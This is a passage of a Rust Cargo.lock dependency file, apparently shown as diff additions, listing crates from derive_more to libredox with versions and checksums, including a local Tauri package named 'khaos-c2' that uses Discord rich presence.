"7cd812cc2bc1d69d4764bd80df88b4317eaef9e773c75226407d9bc0876b211c" +dependencies = [ + "powerfmt", + "serde_core", +] + +[[package]] +name = "derive_more" +version = "2.1.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d751e9e49156b02b44f9c1815bcb94b984cdcc4396ecc32521c739452808b134" +dependencies = [ + "derive_more-impl", +] + +[[package]] +name = "derive_more-impl" +version = "2.1.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "799a97264921d8623a957f6c3b9011f3b5492f557bbb7a5a19b7fa6d06ba8dcb" +dependencies = [ + "proc-macro2", + "quote", + "rustc_version", + "syn 2.0.117", +] + +[[package]] +name = "digest" +version = "0.10.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9ed9a281f7bc9b7576e61468ba615a66a5c8cfdff42420a70aa82701a3b1e292" +dependencies = [ + "block-buffer", + "crypto-common", +] + +[[package]] +name = "dirs" +version = "6.0.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c3e8aa94d75141228480295a7d0e7feb620b1a5ad9f12bc40be62411e38cce4e" +dependencies = [ + "dirs-sys", +] + +[[package]] +name = "dirs-sys" +version = "0.5.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e01a3366d27ee9890022452ee61b2b63a67e6f13f58900b651ff5665f0bb1fab" +dependencies = [ + "libc", + "option-ext", + "redox_users", + "windows-sys 0.61.2", +] + +[[package]] +name = "discord-rich-presence" +version = "1.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "90c55d69cab17c19677ce3a5f8face993a9e6eaf847fecac3547f3a3ff4a2494" +dependencies = [ + "log", + "serde", + "serde_derive", + "serde_json", + "serde_repr", + "thiserror 2.0.18", + "uuid 0.8.2", +] + +[[package]] +name = "dispatch2" +version = "0.3.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1e0e367e4e7da84520dedcac1901e4da967309406d1e51017ae1abfb97adbd38" +dependencies = [ + "bitflags 2.11.1", + "block2", + "libc", + "objc2", +] + +[[package]] +name = "displaydoc" +version = "0.2.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "97369cbbc041bc366949bc74d34658d6cda5621039731c6310521892a3a20ae0" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "dlopen2" +version = "0.8.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5e2c5bd4158e66d1e215c49b837e11d62f3267b30c92f1d171c4d3105e3dc4d4" +dependencies = [ + "dlopen2_derive", + "libc", + "once_cell", + "winapi", +] + +[[package]] +name = "dlopen2_derive" +version = "0.4.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0fbbb781877580993a8707ec48672673ec7b81eeba04cfd2310bd28c08e47c8f" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "dom_query" +version = "0.27.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "521e380c0c8afb8d9a1e83a1822ee03556fc3e3e7dbc1fd30be14e37f9cb3f89" +dependencies = [ + "bit-set", + "cssparser", + "foldhash 0.2.0", + "html5ever", + "precomputed-hash", + "selectors", + "tendril", +] + +[[package]] +name = "dpi" +version = "0.1.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d8b14ccef22fc6f5a8f4d7d768562a182c04ce9a3b3157b91390b52ddfdf1a76" +dependencies = [ + "serde", +] + +[[package]] +name = "dtoa" +version = "1.0.11" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4c3cf4824e2d5f025c7b531afcb2325364084a16806f6d47fbc1f5fbd9960590" + +[[package]] +name = "dtoa-short" +version = "0.3.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cd1511a7b6a56299bd043a9c167a6d2bfb37bf84a6dfceaba651168adfb43c87" +dependencies = [ + "dtoa", +] + +[[package]] +name = "dtor" +version = "0.3.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f1057d6c64987086ff8ed0fd3fbf377a6b7d205cc7715868cd401705f715cbe4" +dependencies = [ + "dtor-proc-macro", +] + +[[package]] +name = "dtor-proc-macro" +version = "0.0.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f678cf4a922c215c63e0de95eb1ff08a958a81d47e485cf9da1e27bf6305cfa5" + +[[package]] +name = "dunce" +version = "1.0.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "92773504d58c093f6de2459af4af33faa518c13451eb8f2b5698ed3d36e7c813" + +[[package]] +name = "dyn-clone" +version = "1.0.20" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d0881ea181b1df73ff77ffaaf9c7544ecc11e82fba9b5f27b262a3c73a332555" + +[[package]] +name = "embed-resource" +version = "3.0.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c31a88c8d26de40ed18fe748c547845aa39de1db3afd958f8cb91579f3644bcb" +dependencies = [ + "cc", + "memchr", + "rustc_version", + "toml 1.1.2+spec-1.1.0", + "vswhom", + "winreg", +] + +[[package]] +name = "embed_plist" +version = "1.2.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4ef6b89e5b37196644d8796de5268852ff179b44e96276cf4290264843743bb7" + +[[package]] +name = "equivalent" +version = "1.0.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "877a4ace8713b0bcf2a4e7eec82529c029f1d0619886d18145fea96c3ffe5c0f" + +[[package]] +name = "erased-serde" +version = "0.4.10" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d2add8a07dd6a8d93ff627029c51de145e12686fbc36ecb298ac22e74cf02dec" +dependencies = [ + "serde", + "serde_core", + "typeid", +] + +[[package]] +name = "fastrand" +version = "2.4.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9f1f227452a390804cdb637b74a86990f2a7d7ba4b7d5693aac9b4dd6defd8d6" + +[[package]] +name = "fdeflate" +version = "0.3.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1e6853b52649d4ac5c0bd02320cddc5ba956bdb407c4b75a2c6b75bf51500f8c" +dependencies = [ + "simd-adler32", +] + +[[package]] +name = "field-offset" +version = "0.3.6" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "38e2275cc4e4fc009b0669731a1e5ab7ebf11f469eaede2bab9309a5b4d6057f" +dependencies = [ + "memoffset", + "rustc_version", +] + +[[package]] +name = "find-msvc-tools" +version = "0.1.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5baebc0774151f905a1a2cc41989300b1e6fbb29aff0ceffa1064fdd3088d582" + +[[package]] +name = "flate2" +version = "1.1.9" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "843fba2746e448b37e26a819579957415c8cef339bf08564fe8b7ddbd959573c" +dependencies = [ + "crc32fast", + "miniz_oxide", +] + +[[package]] +name = "fnv" +version = "1.0.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3f9eec918d3f24069decb9af1554cad7c880e2da24a9afd88aca000531ab82c1" + +[[package]] +name = "foldhash" +version = "0.1.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d9c4f5dac5e15c24eb999c26181a6ca40b39fe946cbe4c263c7209467bc83af2" + +[[package]] +name = "foldhash" +version = "0.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "77ce24cb58228fbb8aa041425bb1050850ac19177686ea6e0f41a70416f56fdb" + +[[package]] +name = "foreign-types" +version = "0.5.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d737d9aa519fb7b749cbc3b962edcf310a8dd1f4b67c91c4f83975dbdd17d965" +dependencies = [ + "foreign-types-macros", + "foreign-types-shared", +] + +[[package]] +name = "foreign-types-macros" +version = "0.2.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1a5c6c585bc94aaf2c7b51dd4c2ba22680844aba4c687be581871a6f518c5742" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "foreign-types-shared" +version = "0.3.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "aa9a19cbb55df58761df49b23516a86d432839add4af60fc256da840f66ed35b" + +[[package]] +name = "form_urlencoded" +version = "1.2.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cb4cb245038516f5f85277875cdaa4f7d2c9a0fa0468de06ed190163b1581fcf" +dependencies = [ + "percent-encoding", +] + +[[package]] +name = "futures-channel" +version = "0.3.32" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "07bbe89c50d7a535e539b8c17bc0b49bdb77747034daa8087407d655f3f7cc1d" +dependencies = [ + "futures-core", +] + +[[package]] +name = "futures-core" +version = "0.3.32" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7e3450815272ef58cec6d564423f6e755e25379b217b0bc688e295ba24df6b1d" + +[[package]] +name = "futures-executor" +version = "0.3.32" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "baf29c38818342a3b26b5b923639e7b1f4a61fc5e76102d4b1981c6dc7a7579d" +dependencies = [ + "futures-core", + "futures-task", + "futures-util", +] + +[[package]] +name = "futures-io" +version = "0.3.32" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cecba35d7ad927e23624b22ad55235f2239cfa44fd10428eecbeba6d6a717718" + +[[package]] +name = "futures-macro" +version = "0.3.32" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e835b70203e41293343137df5c0664546da5745f82ec9b84d40be8336958447b" +dependencies = [ + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "futures-sink" +version = "0.3.32" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c39754e157331b013978ec91992bde1ac089843443c49cbc7f46150b0fad0893" + +[[package]] +name = "futures-task" +version = "0.3.32" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "037711b3d59c33004d3856fbdc83b99d4ff37a24768fa1be9ce3538a1cde4393" + +[[package]] +name = "futures-util" +version = "0.3.32" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "389ca41296e6190b48053de0321d02a77f32f8a5d2461dd38762c0593805c6d6" +dependencies = [ + "futures-core", + "futures-io", + "futures-macro", + "futures-sink", + "futures-task", + "memchr", + "pin-project-lite", + "slab", +] + +[[package]] +name = "gdk" +version = "0.18.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d9f245958c627ac99d8e529166f9823fb3b838d1d41fd2b297af3075093c2691" +dependencies = [ + "cairo-rs", + "gdk-pixbuf", + "gdk-sys", + "gio", + "glib", + "libc", + "pango", +] + +[[package]] +name = "gdk-pixbuf" +version = "0.18.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "50e1f5f1b0bfb830d6ccc8066d18db35c487b1b2b1e8589b5dfe9f07e8defaec" +dependencies = [ + "gdk-pixbuf-sys", + "gio", + "glib", + "libc", + "once_cell", +] + +[[package]] +name = "gdk-pixbuf-sys" +version = "0.18.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3f9839ea644ed9c97a34d129ad56d38a25e6756f99f3a88e15cd39c20629caf7" +dependencies = [ + "gio-sys", + "glib-sys", + "gobject-sys", + "libc", + "system-deps", +] + +[[package]] +name = "gdk-sys" +version = "0.18.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5c2d13f38594ac1e66619e188c6d5a1adb98d11b2fcf7894fc416ad76aa2f3f7" +dependencies = [ + "cairo-sys-rs", + "gdk-pixbuf-sys", + "gio-sys", + "glib-sys", + "gobject-sys", + "libc", + "pango-sys", + "pkg-config", + "system-deps", +] + +[[package]] +name = "gdkwayland-sys" +version = "0.18.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "140071d506d223f7572b9f09b5e155afbd77428cd5cc7af8f2694c41d98dfe69" +dependencies = [ + "gdk-sys", + "glib-sys", + "gobject-sys", + "libc", + "pkg-config", + "system-deps", +] + +[[package]] +name = "gdkx11" +version = "0.18.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3caa00e14351bebbc8183b3c36690327eb77c49abc2268dd4bd36b856db3fbfe" +dependencies = [ + "gdk", + "gdkx11-sys", + "gio", + "glib", + "libc", + "x11", +] + +[[package]] +name = "gdkx11-sys" +version = "0.18.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6e2e7445fe01ac26f11601db260dd8608fe172514eb63b3b5e261ea6b0f4428d" +dependencies = [ + "gdk-sys", + "glib-sys", + "libc", + "system-deps", + "x11", +] + +[[package]] +name = "generic-array" +version = "0.14.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "85649ca51fd72272d7821adaf274ad91c288277713d9c18820d8499a7ff69e9a" +dependencies = [ + "typenum", + "version_check", +] + +[[package]] +name = "getrandom" +version = "0.2.17" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ff2abc00be7fca6ebc474524697ae276ad847ad0a6b3faa4bcb027e9a4614ad0" +dependencies = [ + "cfg-if", + "libc", + "wasi", +] + +[[package]] +name = "getrandom" +version = "0.3.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "899def5c37c4fd7b2664648c28120ecec138e4d395b459e5ca34f9cce2dd77fd" +dependencies = [ + "cfg-if", + "libc", + "r-efi 5.3.0", + "wasip2", +] + +[[package]] +name = "getrandom" +version = "0.4.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0de51e6874e94e7bf76d726fc5d13ba782deca734ff60d5bb2fb2607c7406555" +dependencies = [ + "cfg-if", + "libc", + "r-efi 6.0.0", + "wasip2", + "wasip3", +] + +[[package]] +name = "gio" +version = "0.18.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d4fc8f532f87b79cbc51a79748f16a6828fb784be93145a322fa14d06d354c73" +dependencies = [ + "futures-channel", + "futures-core", + "futures-io", + "futures-util", + "gio-sys", + "glib", + "libc", + "once_cell", + "pin-project-lite", + "smallvec", + "thiserror 1.0.69", +] + +[[package]] +name = "gio-sys" +version = "0.18.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "37566df850baf5e4cb0dfb78af2e4b9898d817ed9263d1090a2df958c64737d2" +dependencies = [ + "glib-sys", + "gobject-sys", + "libc", + "system-deps", + "winapi", +] + +[[package]] +name = "glib" +version = "0.18.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "233daaf6e83ae6a12a52055f568f9d7cf4671dabb78ff9560ab6da230ce00ee5" +dependencies = [ + "bitflags 2.11.1", + "futures-channel", + "futures-core", + "futures-executor", + "futures-task", + "futures-util", + "gio-sys", + "glib-macros", + "glib-sys", + "gobject-sys", + "libc", + "memchr", + "once_cell", + "smallvec", + "thiserror 1.0.69", +] + +[[package]] +name = "glib-macros" +version = "0.18.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0bb0228f477c0900c880fd78c8759b95c7636dbd7842707f49e132378aa2acdc" +dependencies = [ + "heck 0.4.1", + "proc-macro-crate 2.0.2", + "proc-macro-error", + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "glib-sys" +version = "0.18.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "063ce2eb6a8d0ea93d2bf8ba1957e78dbab6be1c2220dd3daca57d5a9d869898" +dependencies = [ + "libc", + "system-deps", +] + +[[package]] +name = "glob" +version = "0.3.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0cc23270f6e1808e30a928bdc84dea0b9b4136a8bc82338574f23baf47bbd280" + +[[package]] +name = "gobject-sys" +version = "0.18.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0850127b514d1c4a4654ead6dedadb18198999985908e6ffe4436f53c785ce44" +dependencies = [ + "glib-sys", + "libc", + "system-deps", +] + +[[package]] +name = "gtk" +version = "0.18.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "fd56fb197bfc42bd5d2751f4f017d44ff59fbb58140c6b49f9b3b2bdab08506a" +dependencies = [ + "atk", + "cairo-rs", + "field-offset", + "futures-channel", + "gdk", + "gdk-pixbuf", + "gio", + "glib", + "gtk-sys", + "gtk3-macros", + "libc", + "pango", + "pkg-config", +] + +[[package]] +name = "gtk-sys" +version = "0.18.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8f29a1c21c59553eb7dd40e918be54dccd60c52b049b75119d5d96ce6b624414" +dependencies = [ + "atk-sys", + "cairo-sys-rs", + "gdk-pixbuf-sys", + "gdk-sys", + "gio-sys", + "glib-sys", + "gobject-sys", + "libc", + "pango-sys", + "system-deps", +] + +[[package]] +name = "gtk3-macros" +version = "0.18.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "52ff3c5b21f14f0736fed6dcfc0bfb4225ebf5725f3c0209edeec181e4d73e9d" +dependencies = [ + "proc-macro-crate 1.3.1", + "proc-macro-error", + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "hashbrown" +version = "0.12.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8a9ee70c43aaf417c914396645a0fa852624801b24ebb7ae78fe8272889ac888" + +[[package]] +name = "hashbrown" +version = "0.15.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9229cfe53dfd69f0609a49f65461bd93001ea1ef889cd5529dd176593f5338a1" +dependencies = [ + "foldhash 0.1.5", +] + +[[package]] +name = "hashbrown" +version = "0.17.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ed5909b6e89a2db4456e54cd5f673791d7eca6732202bbf2a9cc504fe2f9b84a" + +[[package]] +name = "heck" +version = "0.4.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "95505c38b4572b2d910cecb0281560f54b440a19336cbbcb27bf6ce6adc6f5a8" + +[[package]] +name = "heck" +version = "0.5.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2304e00983f87ffb38b55b444b5e3b60a884b5d30c0fca7d82fe33449bbe55ea" + +[[package]] +name = "hex" +version = "0.4.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7f24254aa9a54b5c858eaee2f5bccdb46aaf0e486a595ed5fd8f86ba55232a70" + +[[package]] +name = "html5ever" +version = "0.38.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1054432bae2f14e0061e33d23402fbaa67a921d319d56adc6bcf887ddad1cbc2" +dependencies = [ + "log", + "markup5ever", +] + +[[package]] +name = "http" +version = "1.4.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e3ba2a386d7f85a81f119ad7498ebe444d2e22c2af0b86b069416ace48b3311a" +dependencies = [ + "bytes", + "itoa", +] + +[[package]] +name = "http-body" +version = "1.0.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1efedce1fb8e6913f23e0c92de8e62cd5b772a67e7b3946df930a62566c93184" +dependencies = [ + "bytes", + "http", +] + +[[package]] +name = "http-body-util" +version = "0.1.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b021d93e26becf5dc7e1b75b1bed1fd93124b374ceb73f43d4d4eafec896a64a" +dependencies = [ + "bytes", + "futures-core", + "http", + "http-body", + "pin-project-lite", +] + +[[package]] +name = "httparse" +version = "1.10.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6dbf3de79e51f3d586ab4cb9d5c3e2c14aa28ed23d180cf89b4df0454a69cc87" + +[[package]] +name = "hyper" +version = "1.9.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6299f016b246a94207e63da54dbe807655bf9e00044f73ded42c3ac5305fbcca" +dependencies = [ + "atomic-waker", + "bytes", + "futures-channel", + "futures-core", + "http", + "http-body", + "httparse", + "itoa", + "pin-project-lite", + "smallvec", + "tokio", + "want", +] + +[[package]] +name = "hyper-util" +version = "0.1.20" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "96547c2556ec9d12fb1578c4eaf448b04993e7fb79cbaad930a656880a6bdfa0" +dependencies = [ + "base64 0.22.1", + "bytes", + "futures-channel", + "futures-util", + "http", + "http-body", + "hyper", + "ipnet", + "libc", + "percent-encoding", + "pin-project-lite", + "socket2", + "tokio", + "tower-service", + "tracing", +] + +[[package]] +name = "iana-time-zone" +version = "0.1.65" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e31bc9ad994ba00e440a8aa5c9ef0ec67d5cb5e5cb0cc7f8b744a35b389cc470" +dependencies = [ + "android_system_properties", + "core-foundation-sys", + "iana-time-zone-haiku", + "js-sys", + "log", + "wasm-bindgen", + "windows-core 0.62.2", +] + +[[package]] +name = "iana-time-zone-haiku" +version = "0.1.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f31827a206f56af32e590ba56d5d2d085f558508192593743f16b2306495269f" +dependencies = [ + "cc", +] + +[[package]] +name = "ico" +version = "0.5.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3e795dff5605e0f04bff85ca41b51a96b83e80b281e96231bcaaf1ac35103371" +dependencies = [ + "byteorder", + "png 0.17.16", +] + +[[package]] +name = "icu_collections" +version = "2.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2984d1cd16c883d7935b9e07e44071dca8d917fd52ecc02c04d5fa0b5a3f191c" +dependencies = [ + "displaydoc", + "potential_utf", + "utf8_iter", + "yoke", + "zerofrom", + "zerovec", +] + +[[package]] +name = "icu_locale_core" +version = "2.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "92219b62b3e2b4d88ac5119f8904c10f8f61bf7e95b640d25ba3075e6cac2c29" +dependencies = [ + "displaydoc", + "litemap", + "tinystr", + "writeable", + "zerovec", +] + +[[package]] +name = "icu_normalizer" +version = "2.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c56e5ee99d6e3d33bd91c5d85458b6005a22140021cc324cea84dd0e72cff3b4" +dependencies = [ + "icu_collections", + "icu_normalizer_data", + "icu_properties", + "icu_provider", + "smallvec", + "zerovec", +] + +[[package]] +name = "icu_normalizer_data" +version = "2.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "da3be0ae77ea334f4da67c12f149704f19f81d1adf7c51cf482943e84a2bad38" + +[[package]] +name = "icu_properties" +version = "2.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "bee3b67d0ea5c2cca5003417989af8996f8604e34fb9ddf96208a033901e70de" +dependencies = [ + "icu_collections", + "icu_locale_core", + "icu_properties_data", + "icu_provider", + "zerotrie", + "zerovec", +] + +[[package]] +name = "icu_properties_data" +version = "2.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8e2bbb201e0c04f7b4b3e14382af113e17ba4f63e2c9d2ee626b720cbce54a14" + +[[package]] +name = "icu_provider" +version = "2.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "139c4cf31c8b5f33d7e199446eff9c1e02decfc2f0eec2c8d71f65befa45b421" +dependencies = [ + "displaydoc", + "icu_locale_core", + "writeable", + "yoke", + "zerofrom", + "zerotrie", + "zerovec", +] + +[[package]] +name = "id-arena" +version = "2.3.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3d3067d79b975e8844ca9eb072e16b31c3c1c36928edf9c6789548c524d0d954" + +[[package]] +name = "ident_case" +version = "1.0.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b9e0384b61958566e926dc50660321d12159025e767c18e043daf26b70104c39" + +[[package]] +name = "idna" +version = "1.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3b0875f23caa03898994f6ddc501886a45c7d3d62d04d2d90788d47be1b1e4de" +dependencies = [ + "idna_adapter", + "smallvec", + "utf8_iter", +] + +[[package]] +name = "idna_adapter" +version = "1.2.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cb68373c0d6620ef8105e855e7745e18b0d00d3bdb07fb532e434244cdb9a714" +dependencies = [ + "icu_normalizer", + "icu_properties", +] + +[[package]] +name = "indexmap" +version = "1.9.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "bd070e393353796e801d209ad339e89596eb4c8d430d18ede6a1cced8fafbd99" +dependencies = [ + "autocfg", + "hashbrown 0.12.3", + "serde", +] + +[[package]] +name = "indexmap" +version = "2.14.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d466e9454f08e4a911e14806c24e16fba1b4c121d1ea474396f396069cf949d9" +dependencies = [ + "equivalent", + "hashbrown 0.17.1", + "serde", + "serde_core", +] + +[[package]] +name = "infer" +version = "0.19.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a588916bfdfd92e71cacef98a63d9b1f0d74d6599980d11894290e7ddefffcf7" +dependencies = [ + "cfb", +] + +[[package]] +name = "ipnet" +version = "2.12.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d98f6fed1fde3f8c21bc40a1abb88dd75e67924f9cffc3ef95607bad8017f8e2" + +[[package]] +name = "itoa" +version = "1.0.18" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8f42a60cbdf9a97f5d2305f08a87dc4e09308d1276d28c869c684d7777685682" + +[[package]] +name = "javascriptcore-rs" +version = "1.1.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ca5671e9ffce8ffba57afc24070e906da7fc4b1ba66f2cabebf61bf2ea257fcc" +dependencies = [ + "bitflags 1.3.2", + "glib", + "javascriptcore-rs-sys", +] + +[[package]] +name = "javascriptcore-rs-sys" +version = "1.1.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "af1be78d14ffa4b75b66df31840478fef72b51f8c2465d4ca7c194da9f7a5124" +dependencies = [ + "glib-sys", + "gobject-sys", + "libc", + "system-deps", +] + +[[package]] +name = "jni" +version = "0.21.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1a87aa2bb7d2af34197c04845522473242e1aa17c12f4935d5856491a7fb8c97" +dependencies = [ + "cesu8", + "cfg-if", + "combine", + "jni-sys 0.3.1", + "log", + "thiserror 1.0.69", + "walkdir", + "windows-sys 0.45.0", +] + +[[package]] +name = "jni-sys" +version = "0.3.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "41a652e1f9b6e0275df1f15b32661cf0d4b78d4d87ddec5e0c3c20f097433258" +dependencies = [ + "jni-sys 0.4.1", +] + +[[package]] +name = "jni-sys" +version = "0.4.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c6377a88cb3910bee9b0fa88d4f42e1d2da8e79915598f65fb0c7ee14c878af2" +dependencies = [ + "jni-sys-macros", +] + +[[package]] +name = "jni-sys-macros" +version = "0.4.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "38c0b942f458fe50cdac086d2f946512305e5631e720728f2a61aabcd47a6264" +dependencies = [ + "quote", + "syn 2.0.117", +] + +[[package]] +name = "js-sys" +version = "0.3.98" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "67df7112613f8bfd9150013a0314e196f4800d3201ae742489d999db2f979f08" +dependencies = [ + "cfg-if", + "futures-util", + "once_cell", + "wasm-bindgen", +] + +[[package]] +name = "json-patch" +version = "3.0.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "863726d7afb6bc2590eeff7135d923545e5e964f004c2ccf8716c25e70a86f08" +dependencies = [ + "jsonptr", + "serde", + "serde_json", + "thiserror 1.0.69", +] + +[[package]] +name = "jsonptr" +version = "0.6.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5dea2b27dd239b2556ed7a25ba842fe47fd602e7fc7433c2a8d6106d4d9edd70" +dependencies = [ + "serde", + "serde_json", +] + +[[package]] +name = "keyboard-types" +version = "0.7.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b750dcadc39a09dbadd74e118f6dd6598df77fa01df0cfcdc52c28dece74528a" +dependencies = [ + "bitflags 2.11.1", + "serde", + "unicode-segmentation", +] + +[[package]] +name = "khaos-c2" +version = "1.0.0" +dependencies = [ + "discord-rich-presence", + "serde", + "serde_json", + "tauri", + "tauri-build", +] + +[[package]] +name = "leb128fmt" +version = "0.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "09edd9e8b54e49e587e4f6295a7d29c3ea94d469cb40ab8ca70b288248a81db2" + +[[package]] +name = "libappindicator" +version = "0.9.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "03589b9607c868cc7ae54c0b2a22c8dc03dd41692d48f2d7df73615c6a95dc0a" +dependencies = [ + "glib", + "gtk", + "gtk-sys", + "libappindicator-sys", + "log", +] + +[[package]] +name = "libappindicator-sys" +version = "0.9.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6e9ec52138abedcc58dc17a7c6c0c00a2bdb4f3427c7f63fa97fd0d859155caf" +dependencies = [ + "gtk-sys", + "libloading", + "once_cell", +] + +[[package]] +name = "libc" +version = "0.2.186" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "68ab91017fe16c622486840e4c83c9a37afeff978bd239b5293d61ece587de66" + +[[package]] +name = "libdbus-sys" +version = "0.2.7" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "328c4789d42200f1eeec05bd86c9c13c7f091d2ba9a6ea35acdf51f31bc0f043" +dependencies = [ + "pkg-config", +] + +[[package]] +name = "libloading" +version = "0.7.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b67380fd3b2fbe7527a606e18729d21c6f3951633d0500574c4dc22d2d638b9f" +dependencies = [ + "cfg-if", + "winapi", +] + +[[package]] +name = "libredox" +version = "0.1.16" 